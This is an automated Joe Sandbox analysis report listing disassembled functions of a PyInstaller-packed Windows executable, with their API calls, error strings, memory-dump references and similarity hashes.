Part of subcall function 00007FF6850B7B60: GetEnvironmentVariableW.KERNEL32(00007FF6850B3A1F), ref: 00007FF6850B7B9A
Part of subcall function 00007FF6850B7B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6850B7BB7

Part of subcall function 00007FF6850C7DEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C7E05

SetEnvironmentVariableW.KERNEL32 ref: 00007FF6850B7AA1

Part of subcall function 00007FF6850B2B30: MessageBoxW.USER32 ref: 00007FF6850B2C05

Strings

_MEI%d, xrefs: 00007FF6850B79F5
LOADER: Failed to set the TMP environment variable., xrefs: 00007FF6850B79CA
TMP, xrefs: 00007FF6850B79B0
TMP, xrefs: 00007FF6850B798A, 00007FF6850B7A49, 00007FF6850B7AD7

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
API String ID: 3752271684-1116378104
Opcode ID: fd0d91a48e08b4ddcb6cebc8fec788b09d16c3cc41867d355545f02c3c8609b6
Instruction ID: 2b9f6e32b922f3d4bc8dd0030b476a5569acd92e62e9c72fb14bb9ae38201876
Opcode Fuzzy Hash: fd0d91a48e08b4ddcb6cebc8fec788b09d16c3cc41867d355545f02c3c8609b6
Instruction Fuzzy Hash: 3B51A152B09643C1FE54B762A8622BA52917F89FE0F45403DED0ECB797EE2CEC06C611

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D65EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6850D661A

Part of subcall function 00007FF6850D5D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D5D7C

_get_daylight.LIBCMT ref: 00007FF6850D662B

Part of subcall function 00007FF6850D5D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D5D1C

_get_daylight.LIBCMT ref: 00007FF6850D663C

Part of subcall function 00007FF6850D5D38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D5D4C

Part of subcall function 00007FF6850CAF0C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6850D3392,?,?,?,00007FF6850D33CF,?,?,00000000,00007FF6850D3895,?,?,00000000,00007FF6850D37C7), ref: 00007FF6850CAF22
Part of subcall function 00007FF6850CAF0C: GetLastError.KERNEL32(?,?,?,00007FF6850D3392,?,?,?,00007FF6850D33CF,?,?,00000000,00007FF6850D3895,?,?,00000000,00007FF6850D37C7), ref: 00007FF6850CAF2C

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6850D687C), ref: 00007FF6850D6663

Strings

W. Europe Summer Time, xrefs: 00007FF6850D6721
W. Europe Standard Time, xrefs: 00007FF6850D6709

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
String ID: W. Europe Standard Time$W. Europe Summer Time
API String ID: 2248164782-690618308
Opcode ID: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
Instruction ID: f923ec9199f0eac48f439a206f7baf85ca0b0d9e50496f4a2a44ed93c748b612
Opcode Fuzzy Hash: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
Instruction Fuzzy Hash: 61515D32E18642C6E760EF65E8915A97760FF48BA4F80523DEA4DC3696DF3CE851C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B88D0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF6850B8901
FindClose.KERNELBASE ref: 00007FF6850B8910

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 61dd1ed1e1c953fe7bf24916078f2f4a3db137be7e9bcdd6edf362509e7e8552
Instruction ID: 3de3228788db0c886aaaf6e6029155de7f46f637bef6829d8d0405723ca5c082
Opcode Fuzzy Hash: 61dd1ed1e1c953fe7bf24916078f2f4a3db137be7e9bcdd6edf362509e7e8552
Instruction Fuzzy Hash: 04F08166A18685C7EBA09F64E48876A7390FF44B34F440339D66D826E4DF3CD448DA00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B1710 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF6850B17D9
fseek, xrefs: 00007FF6850B180D
Failed to create symbolic link %s!, xrefs: 00007FF6850B1753
pyi_arch_extract2fs was called before temporary directory was initialized!, xrefs: 00007FF6850B1726
Failed to extract %s: failed to open target file!, xrefs: 00007FF6850B1790
fopen, xrefs: 00007FF6850B1797
fwrite, xrefs: 00007FF6850B18EC
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6850B1806
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6850B1866
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6850B18F5
fread, xrefs: 00007FF6850B18FC
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6850B18E5
malloc, xrefs: 00007FF6850B186D

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
API String ID: 2030045667-3833288071
Opcode ID: 5f584f7088dbf44249761d4b7ccbccdbdd759d0cd5fd8e5eebf030efb760b50d
Instruction ID: 8b2b9f4ab8d4869ddaaf2ae1413a4ff82366604e709cd82e5ccac4719a4a3906
Opcode Fuzzy Hash: 5f584f7088dbf44249761d4b7ccbccdbdd759d0cd5fd8e5eebf030efb760b50d
Instruction Fuzzy Hash: 6A518C61F08683D2EA10AB11E8902B963A0BF45FE4F844539EE0CC7696DF3CEE45CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B8950 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(0000000100000001,00007FF6850B414C,00007FF6850B7911,?,00007FF6850B7D26,?,00007FF6850B1785), ref: 00007FF6850B8990
OpenProcessToken.ADVAPI32(?,00007FF6850B7D26,?,00007FF6850B1785), ref: 00007FF6850B89A1
GetTokenInformation.KERNELBASE(?,00007FF6850B7D26,?,00007FF6850B1785), ref: 00007FF6850B89C3
GetLastError.KERNEL32(?,00007FF6850B7D26,?,00007FF6850B1785), ref: 00007FF6850B89CD
GetTokenInformation.KERNELBASE(?,00007FF6850B7D26,?,00007FF6850B1785), ref: 00007FF6850B8A0A
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6850B8A1C
FindCloseChangeNotification.KERNELBASE(?,00007FF6850B7D26,?,00007FF6850B1785), ref: 00007FF6850B8A34
LocalFree.KERNEL32(?,00007FF6850B7D26,?,00007FF6850B1785), ref: 00007FF6850B8A66
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF6850B8A8D
CreateDirectoryW.KERNELBASE(?,00007FF6850B7D26,?,00007FF6850B1785), ref: 00007FF6850B8A9E

Strings

S-1-3-4, xrefs: 00007FF6850B8A3F
D:(A;;FA;;;%s), xrefs: 00007FF6850B8A49

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Token$ConvertDescriptorInformationProcessSecurityString$ChangeCloseCreateCurrentDirectoryErrorFindFreeLastLocalNotificationOpen
String ID: D:(A;;FA;;;%s)$S-1-3-4
API String ID: 2187719417-2855260032
Opcode ID: 4b39613617aade8a338840617f0cca77fc3fb7a41e4dde6ea2f209984b7d61d0
Instruction ID: b2ff8d5f11b0e9a69b7a1983d11c8fb5aecc534ef8f286b393eeb513b56b7c26
Opcode Fuzzy Hash: 4b39613617aade8a338840617f0cca77fc3fb7a41e4dde6ea2f209984b7d61d0
Instruction Fuzzy Hash: 6A417332618686C2EB50AF50E4846AA6760FF84BB4F441239EA5EC76E5DF3CE844CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B1AA0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6850B82B0: _fread_nolock.LIBCMT ref: 00007FF6850B835A

_fread_nolock.LIBCMT ref: 00007FF6850B1B54

Part of subcall function 00007FF6850B2890: MessageBoxW.USER32 ref: 00007FF6850B299B

Strings

Failed to seek to cookie position!, xrefs: 00007FF6850B1B2C
Error on file., xrefs: 00007FF6850B1C36
fseek, xrefs: 00007FF6850B1B33
Could not allocate buffer for TOC!, xrefs: 00007FF6850B1BD6
MEI, xrefs: 00007FF6850B1AE2
fread, xrefs: 00007FF6850B1B66, 00007FF6850B1C10
malloc, xrefs: 00007FF6850B1BDD
Failed to read cookie!, xrefs: 00007FF6850B1B5F
Could not read full TOC!, xrefs: 00007FF6850B1C09

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
API String ID: 677216364-1384898525
Opcode ID: 846b52575a3e29ec6c17e049124d6bfaa2b8a30358e366607dda68b9dcda7143
Instruction ID: 0e5dad59cb8f3eb3a0c73da3802e0cc631c7e7834dae1b1db509f7ea719ff9b5
Opcode Fuzzy Hash: 846b52575a3e29ec6c17e049124d6bfaa2b8a30358e366607dda68b9dcda7143
Instruction Fuzzy Hash: 82514971A09642C6EB14EB28E49017977A0FF48FA4F658139DA0DC779ADE7CEC40CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B8080 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6850B8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6850B2ABB), ref: 00007FF6850B8B1A

SetConsoleCtrlHandler.KERNEL32(00000000,00007FF6850B3D52), ref: 00007FF6850B80CF
GetStartupInfoW.KERNEL32 ref: 00007FF6850B80EE

Part of subcall function 00007FF6850CAA14: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850CAA28

Part of subcall function 00007FF6850C8630: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C8697

GetCommandLineW.KERNEL32 ref: 00007FF6850B818E
CreateProcessW.KERNELBASE ref: 00007FF6850B81D0
WaitForSingleObject.KERNEL32 ref: 00007FF6850B81E4
GetExitCodeProcess.KERNELBASE ref: 00007FF6850B81F4

Strings

CreateProcessW, xrefs: 00007FF6850B8207
Error creating child process!, xrefs: 00007FF6850B8200

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Error creating child process!
API String ID: 2895956056-3524285272
Opcode ID: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
Instruction ID: df6e312a0d2c4cf7f8229f0fce07f24bd9e691fb111b3ce3f96c119e9d317048
Opcode Fuzzy Hash: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
Instruction Fuzzy Hash: F2410531A08B86C6DA109B64E4552AAB3A4FF95770F500339E6AD877E5DF7CD844CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B1000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6850B3EC0: GetModuleFileNameW.KERNEL32(?,00007FF6850B39EA), ref: 00007FF6850B3EF1

SetDllDirectoryW.KERNEL32 ref: 00007FF6850B3BE9

Part of subcall function 00007FF6850B7B60: GetEnvironmentVariableW.KERNEL32(00007FF6850B3A1F), ref: 00007FF6850B7B9A
Part of subcall function 00007FF6850B7B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6850B7BB7

Strings

Failed to convert DLL search path!, xrefs: 00007FF6850B3BD1
Cannot open PyInstaller archive from executable (%s) or external archive (%s), xrefs: 00007FF6850B3AC6
_PYI_ONEDIR_MODE, xrefs: 00007FF6850B3A34, 00007FF6850B3A5F
MEI, xrefs: 00007FF6850B3B1B
_MEIPASS2, xrefs: 00007FF6850B3A0B, 00007FF6850B3A74, 00007FF6850B3D22, 00007FF6850B3D2E
Cannot side-load external archive %s (code %d)!, xrefs: 00007FF6850B3B60

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
API String ID: 2344891160-3602715111
Opcode ID: 75d5e878bc4890178a3da353d5770ee612a7f9e78672ba99b8074ad5dbb5bed5
Instruction ID: 5c414074f4d01e4257815459054694e03692acea26a0f3492674898f9771aec6
Opcode Fuzzy Hash: 75d5e878bc4890178a3da353d5770ee612a7f9e78672ba99b8074ad5dbb5bed5
Instruction Fuzzy Hash: E8B18D61E1C687D1EA65BB2194912FD62A0FF84FA4F500139EA4DC779AEF2CED05C702

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B1050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1.2.13, xrefs: 00007FF6850B107E
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6850B111F
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6850B1249
malloc, xrefs: 00007FF6850B10F8, 00007FF6850B1126
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6850B10F1
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6850B10B4

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Message
String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-1655038675
Opcode ID: 912b3f155217b08bd989d1562fee40c331c6fc125c04819d7b59a7e191544c21
Instruction ID: 131d710d379b65b719a159dc7001cb557cf59d5a842b8ce65f0b82d2bc781960
Opcode Fuzzy Hash: 912b3f155217b08bd989d1562fee40c331c6fc125c04819d7b59a7e191544c21
Instruction Fuzzy Hash: D051F122A09682C5EA20AB51E4803BA6290FF85FE5F48413DEE4EC7785EF3CED55C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CF1D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6850CF56A,?,?,-00000018,00007FF6850CB317,?,?,?,00007FF6850CB20E,?,?,?,00007FF6850C6452), ref: 00007FF6850CF34C
GetProcAddress.KERNEL32(?,?,?,00007FF6850CF56A,?,?,-00000018,00007FF6850CB317,?,?,?,00007FF6850CB20E,?,?,?,00007FF6850C6452), ref: 00007FF6850CF358

Strings

api-ms-, xrefs: 00007FF6850CF296
ext-ms-, xrefs: 00007FF6850CF2A9

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
Instruction ID: 899346e85f5d1450977214de8388d013f2a663cf15d880d7c835af2011abbe10
Opcode Fuzzy Hash: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
Instruction Fuzzy Hash: 3141E021B19A02D2EA26CB56A8006B52391BF46FB0F59423DDD0ED7794EF3CEC49C325

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CC01C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850CC449

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9ca903b9cf5f984a890856c9b526cbfbbe81c083043c7d3df747fa7ce8575f70
Instruction ID: 858b3226b2c078e57727afa1983ea650a63ecabd5dbcdb671a482b7e5786dcb8
Opcode Fuzzy Hash: 9ca903b9cf5f984a890856c9b526cbfbbe81c083043c7d3df747fa7ce8575f70
Instruction Fuzzy Hash: C9C1D022A0C786D2E6609B55D4002BD7B94FF92FA0F594139DA5E87392CF7CEC45C722

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CD520 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6850CD50B), ref: 00007FF6850CD63C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6850CD50B), ref: 00007FF6850CD6C7

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
Instruction ID: c15642babdc2bdc09baf31569ea46b747629571921bcb161340129fedece4c8e
Opcode Fuzzy Hash: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
Instruction Fuzzy Hash: EF91D163E1869AC5F7609F6594402BD2BA0BF46FA8F14417DDE0E97A84DF38DC86C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CFCEC Relevance: 6.2, APIs: 4, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6850CFDDC
_get_daylight.LIBCMT ref: 00007FF6850CFDED
_get_daylight.LIBCMT ref: 00007FF6850CFDFE
_isindst.LIBCMT ref: 00007FF6850CFEC9

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
Instruction ID: eef757bcc36d29fc25fdd59b2d931fce4c073bed1e1045867fc1b18af918383f
Opcode Fuzzy Hash: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
Instruction Fuzzy Hash: C151C272F04612CAEB24DF2499456BC27A5BF12B79F501239DD1E92BE6DF38AC02C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C5854 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF6850C5887
GetFileInformationByHandle.KERNELBASE ref: 00007FF6850C58E9
GetLastError.KERNEL32 ref: 00007FF6850C597A
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,00007FF6850C578C), ref: 00007FF6850C59C6

Memory Dump Source

